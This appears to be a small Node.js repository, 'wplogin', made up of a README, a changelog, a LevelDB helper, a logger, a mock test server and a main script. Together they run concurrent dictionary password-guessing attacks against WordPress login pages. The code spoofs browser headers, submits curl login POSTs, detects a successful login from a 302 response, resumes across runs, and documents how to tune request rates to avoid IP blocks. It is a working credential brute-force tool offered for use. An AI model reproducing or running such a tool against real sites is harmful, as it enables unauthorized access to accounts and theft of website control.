README.md
# wplogin
Log in to Wordpress


### Install
```
npm install
```


### Test Eventual Success Locally
```
# Will succeed on the 500th request
# Start server locally...
node ./local.js 
# In new terminal...
node ./ -d ./dict.example -v -s5 -r -h 'localhost:3000/500'
```


### Test Eventual Block Locally
```
# Will block incoming requests after 300
# Start server locally...
node ./local.js 
# In new terminal...
node ./ -d ./dict.example -v -s5 -r -h 'localhost:3000/-300'
```


### Test Live Website Using Several Dictionaries in One Folder
```
node ./ -h 'http://www.example.com' -u admin -d ./~dicts -v -s5 -r
```


### Options
* -h [HOST]
	* The website's root domain
	* Required
	* Ex: -h 'http://www.example.com'
* -p [PATH]
	* Path to wp-login.php
	* Default: '/wp-login.php'
	* Ex: -p '/blog/wp-login.php'
* -u [USERNAME]
	* Username to test passwords against
	* Default: 'admin'
	* Ex: -u 'dave'
* -d [PATH]
	* Path to password list(s)
		* Can be a specific file or a directory
		* Dictionaries must be new-line delimited
	* Default: './dict.example'
	* Ex: -d ./~dicts
* -t [INTEGER]
	* Max concurrent curl threads. Lower this to avoid IP blocks. Raise it to increase speed.
		* May need to up your system's process limit. Ex: ulimit -S -n 2048
	* Default: 8
	* Ex: -t4
* -r
	* Quit on match found
	* Default: disabled; will continue testing until blocked or dictionary is spent
* -v
	* Verbose
	* Default: disabled
* -s [INTEGER]
	* Interval in seconds to output stats
	* Default: null (no output)
	* Ex: -s10
* -f
	* Try all passwords even if the result has been saved locally. You can also simply wipe your ./db folder.
	* Default: disabled; Results from previous script runs will be skipped.


### To Do
- Use hyperquest instead of curl. I've benchmarked vastly improved speed and resource allocation efficiency.
- Adaptive curl timing
- Stricter confirmation that we haven't been blocked and don't know it

CHANGELOG.md
## 0.0.16 (2015-02-24)

Features

	- README.md refinements



## 0.0.15 (2015-02-24)

Features

	- Added changelog



test/test.js
var test = require('tape')
,level = require('../level')
;

test('levs',function(t){
	var host = 'www.myblog'+ +new Date +'.com'
	,dict = __dirname+'/../dict.example'
	;
	console.log(['Host: '+host, 'Dictionary: '+dict, '\n'].join('\n'));

	level.saveResult(host, 'ralph', 'password', dict, 1, function(err,data){
		level.saveResult(host, 'ralph', 'password2', dict, 0, function(err,data){
			level.getResultsForHostUser(host, 'ralph', function(err,data){
				console.log(err,data);
				t.equal(data.length, 2, 'level worky')
				t.end();
			});
		});
	});
});


ut.js
var cp = require('child_process').spawn;


module.exports.spawn = function(cmd,args,cb){
	var z = this, exitCode ,errs = [] ,outs = [] ,c = 3
	,proc = cp(cmd,args).on('exit',function(code){
		exitCode = code;
		done();
	});
	proc.stderr.on('data',function(data){
		errs.push(data);
	}).on('end',done);
	proc.stdout.on('data',function(data){
		outs.push(data);
	}).on('end',done);
	function done(){
		if (--c)
			return;
		var err = errs.length ? Buffer.concat(errs).toString() : false
		,out = outs.length ? Buffer.concat(outs).toString() : ''
		;
		if (cb)
			cb(exitCode||false,out,err);
	}
}

module.exports.fileTime =  function(date){
	var z = this, d = date ? date : new Date;
	return d.getFullYear()+'-'+z.padZ(d.getMonth()+1)+'-'+z.padZ(d.getDate())+'_'+z.padZ(d.getHours())+z.padZ(d.getMinutes())+z.padZ(d.getSeconds());
	//return d.getUTCFullYear()+'-'+z.padZ(d.getUTCMonth()+1)+'-'+z.padZ(d.getUTCDate())+'_'+z.padZ(d.getUTCHours())+z.padZ(d.getUTCMinutes())+z.padZ(d.getUTCSeconds())+'UTC';
}

module.exports.prettyTime = function(date){
	var z = this, d = date ? date : new Date;
	return z.padZ(d.getMonth()+1)+'/'+z.padZ(d.getDate())+'/'+d.getFullYear()+' '+z.padZ(d.getHours())+':'+z.padZ(d.getMinutes())+':'+z.padZ(d.getSeconds());
}

module.exports.padZ =  function(n){
	while ((n+'').length < 2)
		n = '0'+n;
	return n;
}


level.js
var config = require('./config')
,db = require('level')(__dirname+'/'+config.db.engines)
,sext = require('sext')
,delim = 'ÿ'
,keyMap = ['host','user','file','pass']
;

module.exports = {
	getResultsForHostUser: function(host, user, cb){
		var z = this
		,key = z.join(host,user,'')
		,results = []
		;
		db.createReadStream({
			start: key
			,end: key+'\xff'
		}).on('error',function(err){
			cb(err);
			cb = function(){};
		}).on('data',function(data){
			results.push(data);
		}).on('end',function(){
			cb(false, z.formatResults(results));
		});
	}
	,getResultsForHostUserFile: function(host, user, file, cb){
		var z = this
		,key = z.join(host,user,file,'')
		,results = []
		;
		db.createReadStream({
			start: key
			,end: key+'\xff'
		}).on('error',function(err){
			cb(err);
			cb = function(){};
		}).on('data',function(data){
			results.push(data);
		}).on('end',function(){
			cb(false, z.formatResults(results));
		});
	}
	,saveResult: function(host, user, file, pass, result, cb){
		var key = this.join(host,user,file,pass);
		db.put(key,result,function(err){
			if (cb)
				cb(err, {key:key});
		});
	}
	,formatResults: function(results){
		var z = this;
		results.forEach(function(v,i){
			results[i] = z.split(v.key,v);
			delete results[i].key;
		});
		return results;
	}
	,join: function(){
		return Array.prototype.slice.call(arguments).join(delim);
	}
	,split: function(key,extend){
		var o = {};
		key.split(delim).forEach(function(v,i){
			//if (v === '') return;
			o[keyMap[i]] = v;
		});
		if (extend)
			sext(o,extend);
		return o;
	}
};

local.js

var maxWait = 10000
,dflt = -200
,index = 0
,port = 3000
,currentWorL
;
require('http').createServer(function(req,res){
	var reqWorL = getWinOrLoseFromRequest(req.url);
	if (reqWorL != currentWorL) {
		currentWorL = reqWorL;
		if (currentWorL >= 0)
			console.log('Will find match on attempt '+currentWorL);
		else
			console.log('Will fail on attempt '+currentWorL);
	}

	if (currentWorL == index) {
		// correct password...
		console.log('Supplying correct password...');
		r(302,'Found','yay!');
	} else if (currentWorL == -index) {
		// block requests...
		console.log('Blocking requests...');
		r(403,'Forbidden','sorry...');
	} else {
		// wrong password...
		res.end(Array(400).join('sup'));
	}
	/*else if (index === 0)
		setTimeout(function(){
			r(404,'Whered it go?');
		},maxWait);*/
	++index;
	function r(a,b,c){
		index = 0;
		res.writeHeader(a,b);
		res.end(['',c,currentWorL,''].join('\n'));
	}
}).listen(port);

console.log('Listening on port '+port);
//console.log(['maxWait: '+maxWait, 'dflt: '+dflt, '\n'].join('\n'));

function getWinOrLoseFromRequest(url) {
	var worl = url.match(/-?[0-9]+/);
	return worl ? worl[0] : dflt;
}


logger.js
var fs = require('fs')
,sext = require('sext')
,ut = require('./ut.js')
;

module.exports = {
	entrySep: '\n\n'
	,pathRoot: null
	,getPath: function(suffix){
		return this.pathRoot ? this.pathRoot + (suffix?'.'+suffix:'') + '.log' : null;
	}
	,create: function(path,content){
		var z = this
			,logPath = z.getPath()
		;
		if (logPath !== null)
			return console.log('Logger::create() called when log file already exists: ',logPath);
		z.pathRoot = path + ut.fileTime();
		logPath = z.getPath();
		for (var i=2,c=arguments.length;i<c;++i)
			content += '\n\n'+arguments[i];
		fs.writeFile(logPath,content+z.entrySep,function(err){
			if (err)
				console.log('Logger: failed to create '+logPath,err);
		});
	}
	,update: function(content,cb){
		var z = this
			,logPath = z.getPath()
			,cb = cb || function(){}
		;
		if (logPath === null) {
			console.log('Logger::update() called when log file not yet created');
			return cb();
		}
		for (var i=1,c=arguments.length;i<c;++i)
			content += '\n\n'+arguments[i];
		fs.appendFile(logPath,content+z.entrySep,function(err){
			if (err)
				console.log('Unable to write to log file '+logPath,err);
			cb();
		});
	}
	,addErroredAttempt: function(pass){
		var z = this
			,logPath = z.getPath('failed')
		;
		if (logPath === null)
			return console.log('Logger::addErroredAttempt() called when log file not yet created');
		for (var i=1,c=arguments.length;i<c;++i)
			content += '\n\n'+arguments[i];
		fs.appendFile(logPath,pass+'\n',function(err){
			if (err)
				console.log('Unable to write to log file '+logPath,err);
		});
	}
};

index.js
#!/usr/bin/env node
// node ./ -d ./~dicts/rockyou.txt -h 'http://www.example.com' -p '/blog/wp-login.php' -v -s30 -t20 -r
// node ./ -h 'http://www.example.com' -u admin -v -s10 -t4 -r
// node ./ -d ./~dicts -v -s5 -r -h 'localhost:3000/500'
// node ./ -d ./~dicts -v -s5 -r -h 'localhost:3000/-200'

var fs = require('fs')
,split = require('split')
,path = require('path')
,through = require('through')
,sext = require('sext')
,argv = require('minimist')(process.argv.slice(2))
,ut = require('./ut')
,logger = require('./logger')
,db = require('./level')
,config = require('./config')
,matchKey = 'Match!'
,verbose = !!argv.v
,recheck = !!argv.f
,intervalSeconds = argv.s ? +argv.s : null
,host = argv.h || ''
,loginPath = argv.p || '/wp-login.php'
,user = encodeURIComponent(argv.u || 'admin')
,quitOnFind = !!argv.r
,logDir = config.logDir || __dirname+'/logs/'
,maxCmdThreads = argv.t ? +argv.t : config.maxCmdThreads
,dictFile = path.normalize(argv.d || __dirname+'/dict.example')
,dictDir
,previouslyChecked = {
	_: {}
	,f: {}
}
,checkedThisProcess = {}
,statsInterval = null
,stats = {
	passesRead: 0
	,attempts: 0
	,attemptsCompleted: 0
	,attemptErrors: 0
	,skipped: 0
	,dups: 0
	,timeStart: null
	,timeEnd: null
	,matches: []
}
,configDisplay = ['host: '+host, 'loginPath: '+loginPath, 'user: '+user, 'dictFile: '+dictFile, 'verbose: '+verbose, 'intervalSeconds: '+intervalSeconds, 'logDir: '+logDir, 'quitOnFind: '+quitOnFind, 'maxCmdThreads: '+maxCmdThreads, 'config: '+JSON.stringify(config)]
;
console.log(configDisplay.join('\n'),'\n');

stats.timeStart = new Date;
startStatsInterval(intervalSeconds);
logger.create(logDir, process.argv.join(' '), ut.prettyTime(stats.timeStart), configDisplay.join('\n'));
//handleProcessErrors();


fs.stat(dictFile,function(err,stat){
	if (err)
		return console.log('Error reading dict', err);
	var files;
	if (stat.isDirectory()){
		dictDir = dictFile;
		try {
			files = fs.readdirSync(dictFile);
			files.forEach(function(file,i){
				files[i] = dictDir+'/'+file;
			});
		} catch (e) {
			return console.log('Error reading dir', e);
		}
	} else if (stat.isFile()) {
		dictDir = path.dirname(dictFile);
		files = [dictFile];
	} else {
		return console.log('Dict path is not a file or directory');
	}
	db.getResultsForHostUser(host, user, function(err,data){
		if (err)
			return console.log('Error getting saved results',err);
		//console.log(data);process.exit();
		previouslyChecked._ = {};
		data.forEach(function(v){
			if (!previouslyChecked.f[v.file])
				previouslyChecked.f[v.file] = {};
			if (v.value == 1)
				return; // dont skip a match
			previouslyChecked._[v.pass] = previouslyChecked.f[v.file][v.pass] = true;
		});
		//console.log(previouslyChecked);process.exit();
		displayPrevChecked();
		delete data;
		through(checkDicts).on('attemptReceived',function(err, match){
			if (!match)
				return !err || console.log('Attempt Error', err);
			saveAndEnd(false,match);
		}).on('fileRead',function(err,data){
			if (err)
				console.log('File Read Error', err);
		}).on('end',function(err,matches){
			saveAndEnd(err,matches[matches.length-1],true);
		}).write(files);
	});
});

function saveAndEnd(err,match,end,postMsg){
	if (!match) {
		next();
	} else {
		db.saveResult(host, match.user, match.file, match.pass, match.result?'1':'0', function(err,data){
			if (err)
				console.log('Error saving result', err);
			next();
		});
	}
	function next(){
		if (end || (match && match.result && quitOnFind))
			showResults(err,postMsg);
	}
}

function handleProcessErrors(){
	process.on('SIGINT',showResults);
	process.on('uncaughtException',showResults);
}

function prettifyStats(){
	var cpy = sext({},stats);
	if (cpy.timeStart)
		cpy.timeStart = ut.prettyTime(cpy.timeStart);
	if (cpy.timeEnd)
		cpy.timeEnd = ut.prettyTime(cpy.timeEnd);
	return '\n\n----------------------------\n\n'
		+ ut.prettyTime()+'\n\n'
		+ JSON.stringify(cpy)+'\n\n'
		+ (stats.attemptErrors
			? 'Retry the '+stats.attemptErrors+' failed attempts by running:\n'
				+ makeReRunFailedAttemptsCmd()
			: '\n')
		+ '----------------------------\n\n'
	;
}

function makeReRunFailedAttemptsCmd(){
	var logPath = logger.getPath('failed');
	if (!logPath)
		return null;
	return process.argv.join(' ').replace(dictFile,logPath);
}

function showResults(err,postMsg){
	stats.timeEnd = new Date;
	stopStatsInterval();
	err
		? console.log('\n------------ Error! ------------\n',err)
		: console.log('\n------------ El Fin ------------\n')
	;
	if (err) {
		if (err.message && err.name && err.stack)
			throw err;
		console.log('ERR',err);
	}
	var pretty = prettifyStats() + (postMsg ? '\n\n'+postMsg : '');
	console.log(pretty);
	logger.update(pretty,function(){
		process.exit();
	});
}

function startStatsInterval(secs){
	var ms = secs * 1000;
	stopStatsInterval();
	statsInterval = setTimeout(function(){
		var pretty = prettifyStats();
		if (verbose)
			console.log(pretty);
		logger.update(pretty);
		startStatsInterval(secs);
	},ms);
}

function stopStatsInterval(){
	if (statsInterval === null)
		return;
	clearTimeout(statsInterval);
	statsInterval = null;
}

function checkDicts(files,cb){
	var z = this
	,filesFinished = 0
	,attempts = 0
	,attemptsReceived = 0
	,activeCmds = 0
	,streams = []
	,cmdQueue = []
	,matches = []
	;
	files.forEach(function(file,fileIndex){
		file = path.normalize(file);
		streams[fileIndex] = fs.createReadStream(file).pipe(split()).on('data',function(pass){
			if (pass == '')
				return z.emit('attemptReceived',false);
			++stats.passesRead;
			if (previouslyChecked._[pass] && !recheck) {
				++stats.skipped;
				return z.emit('attemptReceived',false);
			}
			if (checkedThisProcess[pass]) {
				++stats.dups;
				return z.emit('attemptReceived',false);
			}
			checkedThisProcess[pass] = true;
			//++stats.attempts;
			//++attempts;
			queueCmd({user:user,pass:pass,file:file});
		}).on('error',fileFinished).on('close',fileFinished);
		function fileFinished(err){
			++filesFinished;
			z.emit('fileRead',err,file);
			if (attemptsReceived == attempts && filesFinished == files.length)
				return z.emit('end',false,matches);
		}
		function queueCmd(cmd){
			if (activeCmds < maxCmdThreads)
				return runCmd(cmd);
			cmdQueue.push(cmd);
			if (cmdQueue.length > config.maxLinesReadAhead && !streams[0].paused) {
				//console.log('PAUSED');
				streams.forEach(function(stream){
					stream.pause();
				});
			}	
		}
		function runCmd(cmd){
			++activeCmds;
			++stats.attempts;
			++attempts;
			checkAuth(cmd, function(err,match){
				if (!err) {
					++stats.attemptsCompleted;
					if (match.result) {
						matches.push(match);
						stats.matches.push(match);
					}
				} else {
					++stats.attemptErrors;
					logger.addErroredAttempt(match.pass);
				}
				if (streams[0].paused) {
					//console.log('RESUME');
					streams.forEach(function(stream){
						stream.resume();
					});
				}
				++attemptsReceived;
				z.emit('attemptReceived',err,match);
				if (attemptsReceived == attempts && filesFinished == files.length)
					z.emit('end',false,matches);
				--activeCmds;
				if (cmdQueue.length)
					runCmd(cmdQueue.shift());
			});
		}
	});
}

function checkAuth(entry,cb){
	var cmd = config.curl
	,args = ['-v',host+loginPath
	,'-H',"Cookie: wordpress_test_cookie=WP+Cookie+check"
	,'-H',"Origin: "+host
	,'-H',"Accept-Encoding: gzip,deflate,sdch'"
	,'-H',"Accept-Language: en-US,en;q=0.8"
	,'-H',"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
	,'-H',"Content-Type: application/x-www-form-urlencoded"
	,'-H',"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
	,'-H',"Cache-Control: max-age=0"
	,'-H',"Referer: "+host+loginPath
	,'-H',"Connection: keep-alive"
	,'--data',"log="+entry.user+"&pwd="+encodeURIComponent(entry.pass)+"&wp-submit=Log+In&redirect_to="+encodeURIComponent(host+loginPath.replace(/(wp-login\.php)|(wp-login\/?)/,'wp-admin/'))+"&testcookie=1"
	,'--compressed'
	,'--max-time','20'
	];
	//console.log('curl "'+args.join('" "')+'"');
	//console.log('----SENDING');
	ut.spawn(cmd,args,function(err,stdOut,stdErr){
		//console.log('stdErr:\n'+stdErr+'\nstdOut:\n'+stdOut+'\n\n\n\n');
		//console.log('----RECEIVED');
		var successCheck = stdErr.indexOf('302 Found') != -1
		,invalidPassCheck = stdErr.indexOf('200 OK') != -1
		;
		if (!err && successCheck) {
			entry.result = true;
			if (verbose) console.log(matchKey,'  ',entry);
		} else if (err || !invalidPassCheck) {
			return saveAndEnd('Blocked', null, true, '\n\n'+stdErr+'\n\n\n'+stdOut+'\n\n\nWe\'ve been blocked :(\n\n');
		}
		cb(err,entry,stdOut,stdErr);
	});
}


function displayPrevChecked(){
	console.log('Total previously checked:\n',Object.keys(previouslyChecked._).length,'\n');
	//console.log('\n\npreviouslyChecked.f:\n',previouslyChecked,'\n\n');
	Object.keys(previouslyChecked.f).forEach(function(k){
		console.log('"'+k+'": '+Object.keys(previouslyChecked.f[k]).length);
	});
}

